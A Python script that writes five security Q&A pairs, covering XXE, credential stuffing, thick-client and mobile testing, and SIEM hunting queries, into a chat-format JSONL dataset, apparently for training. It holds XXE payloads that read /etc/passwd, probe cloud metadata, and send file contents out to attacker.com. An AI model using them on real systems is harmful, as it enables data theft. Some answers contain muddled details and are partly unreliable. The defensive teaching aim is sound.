#!/usr/bin/env python3
"""gen_f_fill36.py -- final 22 pairs to cross 1002 total"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

p("What is XML external entity (XXE) injection?",
  "XXE (XML External Entity) injection: exploit XML parser external entity processing; read local files, SSRF, RCE in some cases. XML entities: XML supports entity definitions: <!ENTITY name value>; referenced as &name; in XML; external entity: entity value loaded from external resource: <!ENTITY xxe SYSTEM file:///etc/passwd>; &xxe; in XML body: parser fetches /etc/passwd; contents inserted into XML. Attack types: file read: <?xml version=1.0?><!DOCTYPE foo [<!ENTITY xxe SYSTEM file:///etc/passwd>]><root>&xxe;</root>; if parser processes external entities and response includes entity content: /etc/passwd returned to attacker; SSRF: <!ENTITY xxe SYSTEM http://169.254.169.254/latest/meta-data/> (cloud metadata); internal network scanning: <!ENTITY xxe SYSTEM http://internal-server:8080/>; detect open ports by response differences; error-based: blind XXE; trigger error with file content in error message; OOB (Out-of-Band) XXE: exfiltrate data via DNS or HTTP callback: <!ENTITY % file SYSTEM file:///etc/passwd><!ENTITY % eval <!ENTITY &#x25; exfil SYSTEM http://attacker.com/?x=%file;>>%eval;%exfil; chain parameter entities; file content sent to attacker server. Prerequisites: application accepts and parses XML; XML parser processes external entities (disabled in many modern parsers by default); response includes parsed entity content (or OOB channel available). Finding XXE: any functionality that accepts XML input: API with XML body, file upload (SVG, DOCX, XLSX -- these are XML), web services (SOAP), RSS/Atom feeds; JSON to XML conversion: some parsers accept both; send XML where JSON expected; SVG upload: SVG is XML; <!DOCTYPE> in uploaded SVG; DOCX/XLSX: ZIP archive containing XML files; inject XXE in word/document.xml inside DOCX. Prevention: disable external entity processing: Java SAX: factory.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true); Java DOM: DocumentBuilderFactory.setExpandEntityReferences(false); Python lxml: etree.XMLParser(resolve_entities=False); PHP: libxml_disable_entity_loader(true) (PHP 7.4-; PHP 8.0+ disabled by default); .NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; allowlist: if external entities required: strict allowlist of permitted URLs; input validation: reject DOCTYPE declarations if not needed; OWASP XXE Prevention Cheat Sheet: specific configuration per language and XML library.")

p("What is credential stuffing and how do you defend against it?",
  "Credential stuffing: automated testing of stolen username/password combinations against target application; exploits password reuse. How it works: data breach: billions of credentials from breaches available (Collection #1 -- 87GB, RockYou2021 -- 8.4B, Have I Been Pwned database); credential combos: username:password pairs from breaches; attackers test these against target: script or tool sends automated login attempts; valid credentials: if user reused same password on breach site and target: successful authentication without brute force; scale: millions of attempts per day; distributed across many IPs to avoid rate limiting; success rate: 0.1-2% success rate with large combo list = thousands of compromised accounts. Why credential stuffing works: password reuse: 65% of users reuse passwords across sites; same email and password on Netflix and bank; breach databases: massive, comprehensive, and updated continuously; automation: Sentry MBA, SNIPR, OpenBullet, BlackBullet: configurable attack tools; residential proxies: rotate through millions of IPs; defeat IP-based rate limiting. Detection: login failure rate spike: large-scale stuffing generates many failures; alert on 4xx error rate increase on login endpoint; distributed attack: many source IPs; each IP makes few attempts; harder to detect than single-IP brute force; but: residential proxy IPs have low reputation; correlation across IPs (same user agent, same timing pattern, same behaviour). Defence: CAPTCHA on login: Google reCAPTCHA v3 (invisible); challenge suspicious sessions; friction for automation; credential breach checking: HaveIBeenPwned API integration: on login or password change: check if credential in known breach; prompt password change; NIST 800-63B requirement; anomaly detection: impossible travel: login from New York then London within 1 hour; new device / browser fingerprint: challenge with step-up auth; MFA: even if credential correct: second factor required; most stuffing tools cannot handle MFA; blocks majority of stuffing attacks; rate limiting per account: X login failures on account A: lock account; alert; notify user; regardless of source IP; password manager promotion: encourage unique passwords per site via awareness training; device fingerprinting: consistent fingerprint for legitimate users; unknown fingerprint: challenge; Arkose Labs, DataDome, Imperva: bot management with ML behaviour analysis; monitoring: dark web monitoring (Digital Shadows, Recorded Future): alert if organisation credentials appear in breach dumps; proactive: test own credentials against breach databases.")

p("What is security testing of thick client applications?",
  "Thick client security testing: assess desktop applications; different attack surface from web apps; often overlooked. Types: two-tier: client communicates directly to database; client contains database credentials; one-tier: completely local; no network; three-tier: client communicates with server; server communicates with database; more secure architecture. Attack surface: local storage: application stores data locally; check: configuration files, registry, log files, temp files, SQLite databases, Windows Credential Manager, memory; traffic: application communicates with server; intercept and analyse; local processing: application logic runs locally; reverse engineer; bypass validation; input fields: search, forms, file paths. Tools: Burp Suite: intercept thick client HTTP/HTTPS traffic; configure system proxy; many clients use WinHTTP or WinINet (can be proxied); Wireshark: non-HTTP protocols; raw packet capture; Process Monitor (ProcMon): file system and registry access; Process Hacker: inspect process memory, network connections, loaded DLLs; strings (Sysinternals): extract strings from binary; x64dbg/Ghidra: reverse engineering; Frida: dynamic instrumentation; hook functions, modify behaviour; Android emulator: if mobile thick client; Jadx: decompile APK. Technique areas: traffic interception: configure application to use proxy; if application has certificate pinning: bypass pinning (Frida, custom root CA); analyse: protocols used, authentication mechanism, session management, encrypted vs cleartext; if proprietary protocol: Wireshark dissector or Frida for decoding; local storage: search installation directory: strings on executables (embedded credentials, URLs, encryption keys); check registry: HKCU\\Software\\AppName; check config files (XML, JSON, INI, DB); check temp files (%TEMP%, %APPDATA%); process memory: attach debugger; search for credentials in memory; Procdump and strings on dump; binary analysis: decompile (.NET: dnSpy/ILSpy; Java: Jadx/JD-GUI; native: Ghidra); find: hardcoded credentials, weak encryption, insecure API calls, bypass conditions; authentication: can username/password be bypassed? Can session token be forged? Is there a remember me vulnerability?; client-side validation: validate all validation server-side too (client validation can be bypassed). Common findings: hardcoded credentials: application contains admin password for backend database; DLL hijacking: application loads DLL from user-writable path; man-in-the-middle: no certificate validation; weak encryption: custom XOR encryption for local data; SQL injection: application builds SQL queries with user input (even in local SQLite).")

p("What is mobile application penetration testing?",
  "Mobile application penetration testing: assess iOS and Android apps; client-side security, data storage, network communication, server-side API. Android pentest setup: physical device or emulator (AVD or Genymotion); ADB (Android Debug Bridge): adb devices, adb shell; root or emulator without play protect; static analysis: APK extraction: adb pull, APK from device; decompile: Jadx-GUI or apktool (smali); MobSF (Mobile Security Framework): automated static + dynamic analysis; examine: AndroidManifest.xml (permissions, components, exported activities, debug mode, backup allowed), network_security_config.xml (SSL pinning, cleartext traffic); dynamic analysis: configure Burp proxy on host; set proxy on device (manual or ADB); install Burp CA certificate on device; Android 7.0+: user CAs not trusted by default; bypass: network_security_config.xml modification or Frida SSL bypass; Frida: dynamic instrumentation; hook methods; bypass root detection, certificate pinning, anti-debugging; Drozer: Android security assessment framework; test exposed components; Objection: Frida-based; easy SSL pinning bypass; root detection bypass. iOS pentest setup: jailbroken iPhone or Frida on non-jailbroken (unc0ver, checkra1n); IPA extraction: from App Store (usually DRM-protected); resign-and-install; Frida via SSH; static analysis: Ghidra or Hopper: Mach-O binary analysis; class-dump or frida-objc-bridge: dump Objective-C class headers; Bagbak: IPA decryption from jailbroken device; MobSF: static analysis; Info.plist: permissions, transport security settings; dynamic analysis: Objection: jailbreak detection bypass, SSL pinning bypass; ProxyChains or Burp for traffic interception; Frida scripts for custom hooks. Testing areas: data storage: insecure: SharedPreferences, NSUserDefaults (sensitive data); SQLite database (plaintext credentials, PII); external storage (SD card world-readable); keychain/Keystore misuse; temp files; network: SSL pinning bypass (test after bypass: MITMing traffic); certificate validation; cleartext traffic; sensitive data in network logs; authentication: token storage, session management, MFA bypass; client-side controls: bypass (root detection, jailbreak detection, emulator detection); reverse engineer business logic; IPC (Inter-Process Communication): Android intents: exported activities, deep links, content providers (accessible without authentication?); iOS URL schemes, XPC; server-side API: treat as web app API test; same OWASP API Top 10 applies; OWASP Mobile Security Testing Guide (MSTG): comprehensive mobile security checklist.")

p("What is advanced SIEM query techniques for threat hunting?",
  "Advanced SIEM queries: beyond alert-based detection; proactive hunting for hidden threats using analytics. Threat hunting with SIEM: hypothesis-based: attacker uses Kerberoasting (T1558.003); hunt: large number of Kerberos TGS requests from single host; TGS with RC4 encryption (weaker, preferred for Kerberoasting); data-driven: review anomalies in data; unusual times, unusual volumes, new patterns. Splunk SPL (Search Processing Language) examples: parent-child process anomaly: index=windows EventCode=4688 | stats count by ParentProcessName, NewProcessName | where count < 5 | sort count (rare parent-child process combinations; potential LOLBin abuse); credential spraying detection: index=windows EventCode=4625 | stats count dc(TargetUserName) as unique_users by IpAddress | where unique_users > 20 AND count > 50 | sort -count (many unique usernames from same IP = spraying); Kerberoasting hunt: index=windows EventCode=4769 TicketEncryptionType=0x17 | stats count by ServiceName, ClientAddress | where count > 5; lateral movement via SMB: index=windows EventCode=5145 ShareName=\\\\*\\ADMIN$ | stats count by IpAddress, SubjectUserName | where count > 3; PowerShell encoded commands: index=windows EventCode=4688 NewProcessName=*powershell.exe CommandLine=*-enc* | table _time, ComputerName, SubjectUserName, CommandLine; beaconing detection: index=proxy | stats count, avg(bytes_out) as avg_bytes, stdev(response_time) as stdev_time by dest_host | where count > 100 AND stdev_time < 5 (very consistent response time = beacon). Elastic KQL/EQL examples: EQL sequence: sequence by process.entity_id [process where process.name == cmd.exe] [network where network.direction == egress] (command then network = potential C2); EQL: process where process.parent.name == winword.exe and process.name in (cmd.exe, powershell.exe, wscript.exe) (Office spawning shell = macro execution). Statistical techniques: baseline + standard deviation: calculate mean and stdev for metric over 30 days; alert when current value > mean + 3*stdev (3 sigma); rare events: count events over time; alert on values in lowest 1st percentile; new entities: first seen analysis; alert on: first time user logs in from new country, first time process creates network connection, first time new service installed. Data enrichment: enrich IPs with threat intel (VirusTotal, MISP) within SIEM; user context (HR data: is this a terminated employee?); asset context (is this a server or workstation?); geolocation; network segment.")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f TARGET MET -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
